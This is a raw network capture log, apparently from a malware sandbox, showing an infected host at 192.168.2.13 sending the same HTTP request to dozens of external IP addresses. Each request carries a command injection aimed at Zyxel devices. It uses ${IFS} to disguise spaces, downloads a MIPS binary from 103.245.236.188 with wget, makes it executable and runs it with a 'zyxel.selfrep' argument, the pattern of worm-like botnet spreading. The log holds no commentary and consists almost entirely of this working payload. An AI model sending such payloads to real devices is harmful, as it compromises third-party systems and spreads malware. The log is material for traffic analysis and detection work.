                                                Jan 12, 2024 18:24:50.199619055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8002192.168.2.1340048206.0.7.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.199691057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8003192.168.2.1334076123.82.123.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.199702978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8004192.168.2.13423888.134.5.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.199703932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8005192.168.2.1357044195.212.76.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.199726105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8006192.168.2.1344294191.117.149.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.199798107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8007192.168.2.133548869.155.60.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.199847937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8008192.168.2.1344466122.89.181.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.199943066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8009192.168.2.1338062179.241.164.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.199970961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8010192.168.2.133795060.26.237.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.200020075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8011192.168.2.1333276195.229.102.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.200092077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8012192.168.2.13395662.40.232.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.200130939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8013192.168.2.135808040.179.173.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.200185061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8014192.168.2.135920262.239.89.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.200252056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8015192.168.2.134745861.103.106.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.200354099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8016192.168.2.1340892140.165.62.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.200406075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8017192.168.2.133674878.145.231.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.200474024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8018192.168.2.1348374178.132.180.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.200527906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8019192.168.2.1356324121.98.97.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.200640917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8020192.168.2.1342406217.168.209.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.200750113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8021192.168.2.1360376175.71.115.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.200798988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8022192.168.2.1337608194.8.129.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.200869083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8023192.168.2.133347884.105.200.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.200952053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8024192.168.2.1340640154.189.63.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.200952053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8025192.168.2.134347054.167.125.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.200952053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8026192.168.2.1347304158.48.10.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.200958967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8027192.168.2.1334446198.96.101.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.201021910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8028192.168.2.135103654.113.173.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.201073885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8029192.168.2.133510227.191.12.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.201124907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8030192.168.2.134842882.99.206.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.201216936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8031192.168.2.135585453.218.133.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.201266050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8032192.168.2.133335841.200.31.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.201334000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8033192.168.2.1338382189.107.81.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.201446056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8034192.168.2.1346980146.31.207.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.201488018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8035192.168.2.134836646.124.129.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.201494932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8036192.168.2.1339740156.77.239.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.201607943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8037192.168.2.1339838149.78.100.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.201626062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8038192.168.2.1352486133.98.47.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.201695919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8039192.168.2.1359068181.125.211.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.201749086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8040192.168.2.1360444160.1.3.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.201787949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8041192.168.2.1356836105.53.178.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.201828003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8042192.168.2.1355190113.89.20.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.201905966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8043192.168.2.134210451.209.14.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.201953888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8044192.168.2.135308466.176.123.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.202030897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8045192.168.2.134188054.205.254.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.202074051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8046192.168.2.133538287.75.176.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.202133894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8047192.168.2.135859639.191.80.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.202155113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8048192.168.2.1341538216.18.211.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.202215910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8049192.168.2.1358114203.0.213.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.202303886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8050192.168.2.1349204154.237.12.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.202332973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8051192.168.2.1358666222.176.81.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.202398062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8052192.168.2.1340672143.222.169.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.202454090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8053192.168.2.1335518149.35.33.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.202517986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8054192.168.2.1335318158.169.18.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.202557087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8055192.168.2.1347640180.105.19.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.202630997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8056192.168.2.135042290.180.153.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.202703953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8057192.168.2.135278687.92.251.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.202766895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8058192.168.2.1354918194.119.135.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.202819109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8059192.168.2.135470824.255.97.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.202887058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8060192.168.2.1340956144.245.72.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.202945948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8061192.168.2.1349352193.50.217.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.203016043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8062192.168.2.134150023.21.92.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.203053951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8063192.168.2.134663441.216.97.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.203124046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8064192.168.2.134278488.143.114.161443
                                                TimestampBytes transferredDirectionData
